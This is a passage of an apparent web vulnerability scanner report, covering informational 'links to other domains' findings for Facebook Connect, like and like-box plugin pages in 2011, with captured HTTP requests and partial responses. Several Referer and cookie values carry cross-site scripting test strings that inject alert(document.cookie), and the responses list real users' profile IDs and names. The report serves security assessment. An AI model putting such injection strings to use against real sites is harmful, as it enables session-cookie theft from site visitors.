  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/161100_100001287608349_3707867_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /connect/connect.php?+id=62945690879&connections=10&stream HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:11 GMT
Content-Length: 12430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/apps/application.php?id=62945690879" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg" alt="Star Scene | The Daily Star | Lebanon" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=678745082" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1345.snc4/161576_678745082_6012654_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001287608349" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/161100_100001287608349_3707867_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001158781561" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000492372876" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nancy.aslan" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173827_767025706_4593919_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/paty.kfoury" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=697780598" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/miofeghali" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg" /><div class="name">
...[SNIP]...

20.572. http://www.facebook.com/connect/connect.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/connect/connect.php?%20id=62945690879&connections=10&stream=
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
  • http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173660_836605415_3845318_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs575.ash1/173991_699310051_3510639_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/161100_100001287608349_3707867_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
  • http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css

Request

GET /connect/connect.php?%20id=62945690879&connections=10&stream= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x590

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 21:11:41 GMT
Content-Length: 11828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/apps/application.php?id=62945690879" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg" alt="Star Scene | The Daily Star | Lebanon" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=836605415" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173660_836605415_3845318_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/paty.kfoury" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000492372876" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=697780598" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/miofeghali" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs575.ash1/173991_699310051_3510639_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001287608349" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/161100_100001287608349_3707867_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001158781561" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg" /><div class="name">
...[SNIP]...

20.573. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww1.whdh.com%2Fnews%2Farticles%2Flocal%2F12003359267921%2Fcommuter-rail-service-updates-for-jan-24%2F&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light
The response contains the following links to other domains:
  • http://d.static.ak.fbcdn.net/rsrc.php/yV/r/u2XEW2M3uCu.css
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww1.whdh.com%2Fnews%2Farticles%2Flocal%2F12003359267921%2Fcommuter-rail-service-updates-for-jan-24%2F&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:52 GMT
Content-Length: 10037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://d.static.ak.fbcdn.net/rsrc.php/yV/r/u2XEW2M3uCu.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

20.574. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yU/r/jKqmG9e3p5H.css
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 21:55:20 GMT
Content-Length: 10046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yU/r/jKqmG9e3p5H.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

20.575. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbeirutcityguide&width=250&colorscheme=light&connections=8&stream=false&header=true&height=287
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yL/r/xmHI_BAWBjI.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
  • http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1283.snc4/173433_851905474_6150531_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173816_100001903179424_3289462_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173831_885230253_6704458_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs267.snc3/23271_111217515558400_6673_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs428.ash2/70773_610855543_7232558_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs456.snc4/49935_655960071_7170357_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/161499_100001476439731_1362142_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs721.ash1/161740_1486010960_4789113_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
  • http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbeirutcityguide&width=250&colorscheme=light&connections=8&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Tue, 25 Jan 2011 02:20:40 GMT
Content-Length: 12910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yL/r/xmHI_BAWBjI.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/beirutcityguide" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs267.snc3/23271_111217515558400_6673_q.jpg" alt="Beirut.com" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/abid.bahloul" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs721.ash1/161740_1486010960_4789113_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=610855543" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs428.ash2/70773_610855543_7232558_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=851905474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1283.snc4/173433_851905474_6150531_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001903179424" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173816_100001903179424_3289462_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001476439731" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/161499_100001476439731_1362142_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=885230253" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173831_885230253_6704458_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs456.snc4/49935_655960071_7170357_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

20.576. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=111217515558400&width=760&connections=26&stream=true&header=false&height=555
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yf/r/Pp-oQmFcGTc.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
  • http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
  • http://e.static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png
  • http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1283.snc4/173433_851905474_6150531_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173673_645665173_8179808_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173816_100001903179424_3289462_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173831_885230253_6704458_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1431.snc4/173257_100001950285846_2393096_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1433.snc4/173424_1352486634_4160497_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs267.snc3/23271_111217515558400_6673_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs338.snc4/41764_636357773_2357_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs428.ash2/70773_610855543_7232558_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs442.snc4/48824_1046656972_2377091_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs456.snc4/49935_655960071_7170357_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs478.snc4/50111_766910086_2176310_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs714.ash1/161267_674455524_3070011_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs717.ash1/161419_100001522669503_929421_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/161499_100001476439731_1362142_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs721.ash1/161740_1486010960_4789113_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/likebox.php?id=111217515558400&width=760&connections=26&stream=true&header=false&height=555 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:14:55 GMT
Content-Length: 16200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yf/r/Pp-oQmFcGTc.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/beirutcityguide" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs267.snc3/23271_111217515558400_6673_q.jpg" alt="Beirut.com" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DuhNahh.CuppCakee.Maharsyy" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1433.snc4/173424_1352486634_4160497_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/marc.hayek" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs456.snc4/49935_655960071_7170357_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=885230253" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173831_885230253_6704458_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=766910086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs478.snc4/50111_766910086_2176310_q.jpg" /><div class="name">
